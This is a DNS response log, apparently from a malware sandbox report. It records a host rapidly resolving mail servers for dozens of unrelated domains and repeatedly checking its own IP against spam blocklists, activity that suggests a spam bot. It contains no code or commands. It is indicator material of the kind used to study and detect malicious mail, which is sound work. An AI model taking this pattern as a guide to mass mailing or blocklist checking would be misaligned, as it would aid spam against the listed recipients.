Sep 5, 2021 15:50:23.489670038 CEST	8.8.8.8	192.168.2.4	0x93e2	No error (0)	att.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:23.489670038 CEST	8.8.8.8	192.168.2.4	0x93e2	No error (0)	att.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:23.489670038 CEST	8.8.8.8	192.168.2.4	0x93e2	No error (0)	att.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:23.523588896 CEST	8.8.8.8	192.168.2.4	0x4fd	No error (0)	al-ip4-mx-vip2.prodigy.net		144.160.235.144	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:23.919019938 CEST	8.8.8.8	192.168.2.4	0xeba5	No error (0)	sigaint.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:23.919019938 CEST	8.8.8.8	192.168.2.4	0xeba5	No error (0)	sigaint.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:24.062119007 CEST	8.8.8.8	192.168.2.4	0x6e27	No error (0)	in1-smtp.messagingengine.com		66.111.4.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:24.062119007 CEST	8.8.8.8	192.168.2.4	0x6e27	No error (0)	in1-smtp.messagingengine.com		66.111.4.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:24.062119007 CEST	8.8.8.8	192.168.2.4	0x6e27	No error (0)	in1-smtp.messagingengine.com		66.111.4.70	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:24.062119007 CEST	8.8.8.8	192.168.2.4	0x6e27	No error (0)	in1-smtp.messagingengine.com		66.111.4.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:24.062119007 CEST	8.8.8.8	192.168.2.4	0x6e27	No error (0)	in1-smtp.messagingengine.com		66.111.4.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:24.062119007 CEST	8.8.8.8	192.168.2.4	0x6e27	No error (0)	in1-smtp.messagingengine.com		66.111.4.71	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:25.569596052 CEST	8.8.8.8	192.168.2.4	0x8ca8	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:25.569596052 CEST	8.8.8.8	192.168.2.4	0x8ca8	No error (0)	mta6.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:25.569596052 CEST	8.8.8.8	192.168.2.4	0x8ca8	No error (0)	mta6.am0.yahoodns.net		98.136.96.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:25.569596052 CEST	8.8.8.8	192.168.2.4	0x8ca8	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:25.569596052 CEST	8.8.8.8	192.168.2.4	0x8ca8	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:25.569596052 CEST	8.8.8.8	192.168.2.4	0x8ca8	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:25.569596052 CEST	8.8.8.8	192.168.2.4	0x8ca8	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:25.569596052 CEST	8.8.8.8	192.168.2.4	0x8ca8	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.108515024 CEST	8.8.8.8	192.168.2.4	0x6f07	No error (0)	medtronic.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:26.108515024 CEST	8.8.8.8	192.168.2.4	0x6f07	No error (0)	medtronic.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:26.332320929 CEST	8.8.8.8	192.168.2.4	0xa8f3	No error (0)	in1-smtp.messagingengine.com		66.111.4.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.332320929 CEST	8.8.8.8	192.168.2.4	0xa8f3	No error (0)	in1-smtp.messagingengine.com		66.111.4.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.332320929 CEST	8.8.8.8	192.168.2.4	0xa8f3	No error (0)	in1-smtp.messagingengine.com		66.111.4.71	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.332320929 CEST	8.8.8.8	192.168.2.4	0xa8f3	No error (0)	in1-smtp.messagingengine.com		66.111.4.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.332320929 CEST	8.8.8.8	192.168.2.4	0xa8f3	No error (0)	in1-smtp.messagingengine.com		66.111.4.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.332320929 CEST	8.8.8.8	192.168.2.4	0xa8f3	No error (0)	in1-smtp.messagingengine.com		66.111.4.70	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.423777103 CEST	8.8.8.8	192.168.2.4	0xe88c	No error (0)	mxa-00204301.gslb.pphosted.com		148.163.152.7	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.526051044 CEST	8.8.8.8	192.168.2.4	0x248c	No error (0)	pgcps.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:26.526051044 CEST	8.8.8.8	192.168.2.4	0x248c	No error (0)	pgcps.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:26.526051044 CEST	8.8.8.8	192.168.2.4	0x248c	No error (0)	pgcps.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:26.526051044 CEST	8.8.8.8	192.168.2.4	0x248c	No error (0)	pgcps.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:26.526051044 CEST	8.8.8.8	192.168.2.4	0x248c	No error (0)	pgcps.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:26.655287027 CEST	8.8.8.8	192.168.2.4	0xff7a	No error (0)	ASPMX.L.GOOGLE.COM		108.177.119.26	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.777235985 CEST	8.8.8.8	192.168.2.4	0x836a	No error (0)	in1-smtp.messagingengine.com		66.111.4.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.777235985 CEST	8.8.8.8	192.168.2.4	0x836a	No error (0)	in1-smtp.messagingengine.com		66.111.4.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.777235985 CEST	8.8.8.8	192.168.2.4	0x836a	No error (0)	in1-smtp.messagingengine.com		66.111.4.71	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.777235985 CEST	8.8.8.8	192.168.2.4	0x836a	No error (0)	in1-smtp.messagingengine.com		66.111.4.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.777235985 CEST	8.8.8.8	192.168.2.4	0x836a	No error (0)	in1-smtp.messagingengine.com		66.111.4.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:26.777235985 CEST	8.8.8.8	192.168.2.4	0x836a	No error (0)	in1-smtp.messagingengine.com		66.111.4.70	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.381896973 CEST	8.8.8.8	192.168.2.4	0xefe7	No error (0)	live-com.olc.protection.outlook.com		104.47.66.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.381896973 CEST	8.8.8.8	192.168.2.4	0xefe7	No error (0)	live-com.olc.protection.outlook.com		104.47.59.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.394757032 CEST	8.8.8.8	192.168.2.4	0x5725	No error (0)	minit-europe.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:28.664055109 CEST	8.8.8.8	192.168.2.4	0xfbca	No error (0)	in1-smtp.messagingengine.com		66.111.4.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.664055109 CEST	8.8.8.8	192.168.2.4	0xfbca	No error (0)	in1-smtp.messagingengine.com		66.111.4.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.664055109 CEST	8.8.8.8	192.168.2.4	0xfbca	No error (0)	in1-smtp.messagingengine.com		66.111.4.71	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.664055109 CEST	8.8.8.8	192.168.2.4	0xfbca	No error (0)	in1-smtp.messagingengine.com		66.111.4.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.664055109 CEST	8.8.8.8	192.168.2.4	0xfbca	No error (0)	in1-smtp.messagingengine.com		66.111.4.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.664055109 CEST	8.8.8.8	192.168.2.4	0xfbca	No error (0)	in1-smtp.messagingengine.com		66.111.4.70	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.664999008 CEST	8.8.8.8	192.168.2.4	0x8326	No error (0)	bellsouth.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:28.664999008 CEST	8.8.8.8	192.168.2.4	0x8326	No error (0)	bellsouth.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:28.664999008 CEST	8.8.8.8	192.168.2.4	0x8326	No error (0)	bellsouth.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:28.664999008 CEST	8.8.8.8	192.168.2.4	0x8326	No error (0)	bellsouth.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:28.674510956 CEST	8.8.8.8	192.168.2.4	0x9fe0	No error (0)	antispam.minit-europe.com		13.94.144.32	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:28.780937910 CEST	8.8.8.8	192.168.2.4	0xb7e3	No error (0)	al-ip4-mx-vip2.prodigy.net		144.160.235.144	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:29.344002962 CEST	8.8.8.8	192.168.2.4	0xf81b	No error (0)	interia.pl			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:29.607321978 CEST	8.8.8.8	192.168.2.4	0x9c58	No error (0)	mx.interia.pl		217.74.65.64	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:29.609608889 CEST	8.8.8.8	192.168.2.4	0xd79f	No error (0)	in1-smtp.messagingengine.com		66.111.4.70	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:29.609608889 CEST	8.8.8.8	192.168.2.4	0xd79f	No error (0)	in1-smtp.messagingengine.com		66.111.4.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:29.609608889 CEST	8.8.8.8	192.168.2.4	0xd79f	No error (0)	in1-smtp.messagingengine.com		66.111.4.71	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:29.609608889 CEST	8.8.8.8	192.168.2.4	0xd79f	No error (0)	in1-smtp.messagingengine.com		66.111.4.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:29.609608889 CEST	8.8.8.8	192.168.2.4	0xd79f	No error (0)	in1-smtp.messagingengine.com		66.111.4.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:29.609608889 CEST	8.8.8.8	192.168.2.4	0xd79f	No error (0)	in1-smtp.messagingengine.com		66.111.4.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:30.235109091 CEST	8.8.8.8	192.168.2.4	0x9d70	No error (0)	hughes-walker.co.uk			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:30.235109091 CEST	8.8.8.8	192.168.2.4	0x9d70	No error (0)	hughes-walker.co.uk			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:30.316370010 CEST	8.8.8.8	192.168.2.4	0xf318	No error (0)	mx1.privateemail.com		198.54.122.213	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:30.319540024 CEST	8.8.8.8	192.168.2.4	0x3032	No error (0)	netscape.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:30.360651970 CEST	8.8.8.8	192.168.2.4	0xc83a	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:30.360651970 CEST	8.8.8.8	192.168.2.4	0xc83a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:30.360651970 CEST	8.8.8.8	192.168.2.4	0xc83a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:30.360651970 CEST	8.8.8.8	192.168.2.4	0xc83a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:30.360651970 CEST	8.8.8.8	192.168.2.4	0xc83a	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:30.360651970 CEST	8.8.8.8	192.168.2.4	0xc83a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.576046944 CEST	8.8.8.8	192.168.2.4	0x4c01	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.619535923 CEST	8.8.8.8	192.168.2.4	0x12be	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.688448906 CEST	8.8.8.8	192.168.2.4	0x2635	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.769201994 CEST	8.8.8.8	192.168.2.4	0xc172	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.809361935 CEST	8.8.8.8	192.168.2.4	0xf202	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.861859083 CEST	8.8.8.8	192.168.2.4	0xf4f7	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:32.920469999 CEST	8.8.8.8	192.168.2.4	0x39eb	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:33.008786917 CEST	8.8.8.8	192.168.2.4	0x175c	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:33.059338093 CEST	8.8.8.8	192.168.2.4	0x956a	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:33.126061916 CEST	8.8.8.8	192.168.2.4	0x96a3	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:34.658251047 CEST	8.8.8.8	192.168.2.4	0x9b46	No error (0)	dberney.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:34.658251047 CEST	8.8.8.8	192.168.2.4	0x9b46	No error (0)	dberney.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:34.658251047 CEST	8.8.8.8	192.168.2.4	0x9b46	No error (0)	dberney.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:34.658251047 CEST	8.8.8.8	192.168.2.4	0x9b46	No error (0)	dberney.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:34.658251047 CEST	8.8.8.8	192.168.2.4	0x9b46	No error (0)	dberney.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:34.658251047 CEST	8.8.8.8	192.168.2.4	0x9b46	No error (0)	dberney.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:34.658251047 CEST	8.8.8.8	192.168.2.4	0x9b46	No error (0)	dberney.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:34.716305017 CEST	8.8.8.8	192.168.2.4	0x9659	No error (0)	aspmx.l.google.com		108.177.119.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:34.718836069 CEST	8.8.8.8	192.168.2.4	0xd2b6	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.1	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:34.718836069 CEST	8.8.8.8	192.168.2.4	0xd2b6	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:34.875786066 CEST	8.8.8.8	192.168.2.4	0x9b42	No error (0)	dbesing.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:34.875786066 CEST	8.8.8.8	192.168.2.4	0x9b42	No error (0)	dbesing.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:34.875786066 CEST	8.8.8.8	192.168.2.4	0x9b42	No error (0)	dbesing.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:34.875786066 CEST	8.8.8.8	192.168.2.4	0x9b42	No error (0)	dbesing.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:35.152174950 CEST	8.8.8.8	192.168.2.4	0xe493	No error (0)	mx2.ik2.com		208.77.151.115	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:35.746817112 CEST	8.8.8.8	192.168.2.4	0xdb68	No error (0)	dbfestival.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:35.746817112 CEST	8.8.8.8	192.168.2.4	0xdb68	No error (0)	dbfestival.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:35.746817112 CEST	8.8.8.8	192.168.2.4	0xdb68	No error (0)	dbfestival.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:35.746817112 CEST	8.8.8.8	192.168.2.4	0xdb68	No error (0)	dbfestival.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:35.746817112 CEST	8.8.8.8	192.168.2.4	0xdb68	No error (0)	dbfestival.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:35.813975096 CEST	8.8.8.8	192.168.2.4	0xc56f	No error (0)	alt1.aspmx.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:36.832683086 CEST	8.8.8.8	192.168.2.4	0xe77f	No error (0)	dbfletcher.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:36.832683086 CEST	8.8.8.8	192.168.2.4	0xe77f	No error (0)	dbfletcher.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:36.832683086 CEST	8.8.8.8	192.168.2.4	0xe77f	No error (0)	dbfletcher.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:36.832683086 CEST	8.8.8.8	192.168.2.4	0xe77f	No error (0)	dbfletcher.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:36.886715889 CEST	8.8.8.8	192.168.2.4	0x2ffa	No error (0)	aspmx.l.google.com		108.177.119.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:37.644064903 CEST	8.8.8.8	192.168.2.4	0x80d4	No error (0)	dbfs.id.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:37.644064903 CEST	8.8.8.8	192.168.2.4	0x80d4	No error (0)	dbfs.id.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:37.832858086 CEST	8.8.8.8	192.168.2.4	0x1976	No error (0)	aspmx.l.google.com		108.177.119.26	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:37.941082001 CEST	8.8.8.8	192.168.2.4	0x5f9c	No error (0)	dbgaskill.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:38.212268114 CEST	8.8.8.8	192.168.2.4	0x5ecb	No error (0)	mx1.netsolmail.net		172.65.252.97	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:39.465668917 CEST	8.8.8.8	192.168.2.4	0xfd67	No error (0)	dbgpromotions.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:39.502850056 CEST	8.8.8.8	192.168.2.4	0xd70c	No error (0)	mx1.netsolmail.net		172.65.252.97	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:39.640067101 CEST	8.8.8.8	192.168.2.4	0x6d8e	No error (0)	dbgriffin.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:39.640067101 CEST	8.8.8.8	192.168.2.4	0x6d8e	No error (0)	dbgriffin.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:40.183855057 CEST	8.8.8.8	192.168.2.4	0x45a0	No error (0)	d123140a.ess.barracudanetworks.com		209.222.82.255	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:40.183855057 CEST	8.8.8.8	192.168.2.4	0x45a0	No error (0)	d123140a.ess.barracudanetworks.com		209.222.82.252	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:40.183855057 CEST	8.8.8.8	192.168.2.4	0x45a0	No error (0)	d123140a.ess.barracudanetworks.com		209.222.82.253	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:40.833098888 CEST	8.8.8.8	192.168.2.4	0x9364	No error (0)	mx4.hanmail.net		211.231.108.176	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:41.550966024 CEST	8.8.8.8	192.168.2.4	0x7f63	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.023277044 CEST	8.8.8.8	192.168.2.4	0x3925	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.023277044 CEST	8.8.8.8	192.168.2.4	0x3925	No error (0)	mta6.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.023277044 CEST	8.8.8.8	192.168.2.4	0x3925	No error (0)	mta6.am0.yahoodns.net		98.136.96.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.023277044 CEST	8.8.8.8	192.168.2.4	0x3925	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.023277044 CEST	8.8.8.8	192.168.2.4	0x3925	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.023277044 CEST	8.8.8.8	192.168.2.4	0x3925	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.023277044 CEST	8.8.8.8	192.168.2.4	0x3925	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.023277044 CEST	8.8.8.8	192.168.2.4	0x3925	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.885950089 CEST	8.8.8.8	192.168.2.4	0x8adf	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.893199921 CEST	8.8.8.8	192.168.2.4	0x78a7	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:42.994045019 CEST	8.8.8.8	192.168.2.4	0x1919	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.048378944 CEST	8.8.8.8	192.168.2.4	0x6adb	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.063148022 CEST	8.8.8.8	192.168.2.4	0x51d6	No error (0)	dignityhealth.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:43.063148022 CEST	8.8.8.8	192.168.2.4	0x51d6	No error (0)	dignityhealth.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:43.117906094 CEST	8.8.8.8	192.168.2.4	0x8eb7	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.197175980 CEST	8.8.8.8	192.168.2.4	0xe6c8	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.231750965 CEST	8.8.8.8	192.168.2.4	0x7daa	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.247865915 CEST	8.8.8.8	192.168.2.4	0xf99b	No error (0)	mxb-00116001.gslb.pphosted.com		148.163.156.240	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.335484982 CEST	8.8.8.8	192.168.2.4	0x9ba9	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.394084930 CEST	8.8.8.8	192.168.2.4	0xac9	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.586349010 CEST	8.8.8.8	192.168.2.4	0xce30	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.599597931 CEST	8.8.8.8	192.168.2.4	0xda6f	No error (0)	conex.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:43.599597931 CEST	8.8.8.8	192.168.2.4	0xda6f	No error (0)	conex.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:43.599597931 CEST	8.8.8.8	192.168.2.4	0xda6f	No error (0)	conex.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:43.599597931 CEST	8.8.8.8	192.168.2.4	0xda6f	No error (0)	conex.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:43.624059916 CEST	8.8.8.8	192.168.2.4	0xcf19	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.675257921 CEST	8.8.8.8	192.168.2.4	0xf8fe	No error (0)	mx03.cloud.vadesecure.com		52.47.149.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:43.717349052 CEST	8.8.8.8	192.168.2.4	0xa4e4	No error (0)	cbs.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:43.717349052 CEST	8.8.8.8	192.168.2.4	0xa4e4	No error (0)	cbs.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:43.802648067 CEST	8.8.8.8	192.168.2.4	0xc6b8	No error (0)	mxa-00262c01.gslb.pphosted.com		148.163.152.163	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:44.523890972 CEST	8.8.8.8	192.168.2.4	0x41f6	No error (0)	lambda.uniform.thefreemail.top			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:45.090046883 CEST	8.8.8.8	192.168.2.4	0xfdfc	No error (0)	mx.powered.name		62.141.42.208	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:45.090437889 CEST	8.8.8.8	192.168.2.4	0xe14e	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:45.093905926 CEST	8.8.8.8	192.168.2.4	0xe5fd	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:46.141328096 CEST	8.8.8.8	192.168.2.4	0x44e6	No error (0)	cox.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:46.222547054 CEST	8.8.8.8	192.168.2.4	0x5593	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:46.222547054 CEST	8.8.8.8	192.168.2.4	0x5593	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:46.222547054 CEST	8.8.8.8	192.168.2.4	0x5593	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:46.222547054 CEST	8.8.8.8	192.168.2.4	0x5593	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:46.222547054 CEST	8.8.8.8	192.168.2.4	0x5593	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:46.222547054 CEST	8.8.8.8	192.168.2.4	0x5593	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:46.222547054 CEST	8.8.8.8	192.168.2.4	0x5593	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:46.222547054 CEST	8.8.8.8	192.168.2.4	0x5593	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.451924086 CEST	8.8.8.8	192.168.2.4	0x3757	No error (0)	mx.lycos.com.cust.b.hostedemail.com		64.98.36.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.457086086 CEST	8.8.8.8	192.168.2.4	0x26f1	No error (0)	cxr.mx.a.cloudfilter.net		52.73.137.222	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.457086086 CEST	8.8.8.8	192.168.2.4	0x26f1	No error (0)	cxr.mx.a.cloudfilter.net		35.162.106.154	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.457086086 CEST	8.8.8.8	192.168.2.4	0x26f1	No error (0)	cxr.mx.a.cloudfilter.net		34.212.80.54	A (IP address)	IN (0x0001)
